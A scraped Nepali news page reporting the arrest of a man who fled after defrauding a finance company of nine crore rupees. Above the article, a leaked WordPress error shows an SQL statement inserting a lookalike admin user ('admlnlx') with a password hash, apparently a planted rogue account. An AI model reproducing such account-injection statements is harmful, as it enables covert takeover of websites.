WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWEddndGqmpjBwcMSe14LzVxyulicy/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:06:01', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नौ करोड ठगी गरेर फरार युवक पक्राउ – Gaule Khabar

नौ करोड ठगी गरेर फरार युवक पक्राउ

नौ करोड ठगी गरेर फरार युवक पक्राउ

काठमाडौं,माघ २५ –

बैैकिङ कसुर गरी दुई वर्षदेखि फरार रहेको एक जनालाई सोमबार राती काठमाडौंको पानीपोखरीबाट पक्राउ गरेको छ। प्रहरीले क्यापिटल मर्चेन्ट तथा फाइनान्स कम्पनी लिमिटेडलाई नौ करोड बराबरको ठगी गर्नेलाई पक्राउ गरेको हो। ठगीमा संलग्न काठमाडौं मण्डिखाटारका ४१ वर्षीय किरणकेशर नेपाललाई पक्राउ गरेको केन्द्रीय अनुसन्धान ब्युरोले जनाएको छ। नेपाललाई बैंंकिङ कसुर मुद्दामा पुनरावेदन अदालतले २०७१ बैशाख २९ गते तीन वर्ष कैद र नौ करोड ४१ लाख ३७ हजार सात सय ७४ रुपैयाँ जरिवाना तोकेको थियो। तर उनी फरार रहेकोले सोमबार राती पक्राउ गरी फैसला कार्यान्वयनका लागि जिल्ला अदालत पेश गरी केन्द्रीय कारागार सुन्धारा पठाएको प्रहरीले जनाएको छ।

नेपालले मण्डिखाटारमा आफ्नो नाममा रहेको आठ रोपनी जग्गालाई अत्याधिक मुल्यांकन गराई धितो राखेर हुँदै नभएको सीता खाँडगरी चिनी मिलको लागि भनी फाइनान्स कम्पनीबाट कर्जा लिएका थिए। कम्पनीका पदाधिकारीसँग मिलेमतो गरी २०६७ असार ३१ गते नौ करोड रुपैयाँ कर्जा लिई जग्गा कारोवारमा लगानी गरी दुरुपयोग गरेको प्रहरीले जनाएको छ। यसअघि पनि ब्युरोको प्रहरी टोलीले फाइनान्सलाई ठगी गर्ने अरुणकुमार मराठा, नवराज खत्री, तुलसाकुमारी धमला र भाइकृष्ण खड्कालाई पक्राउ गरिसकेको छ। मराठालाई छ वर्ष कैद र १३ करोड ३० लाख जरिवाना, खत्रीलाई तीन वर्ष कैद र छ करोड ५० लाख जरिवाना, धमलालाई तीन वर्ष कैद र तीन करोड ५० लाख जरिवाना र खड्कालाई तीन वर्ष कैद र तीन करोड ५० लाख रुपैयाँ अदालतले तोकेको थियो। उनीहरु अहिले सबै जना कारागारमा रहेको पनि ब्युरोले जनाएको छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका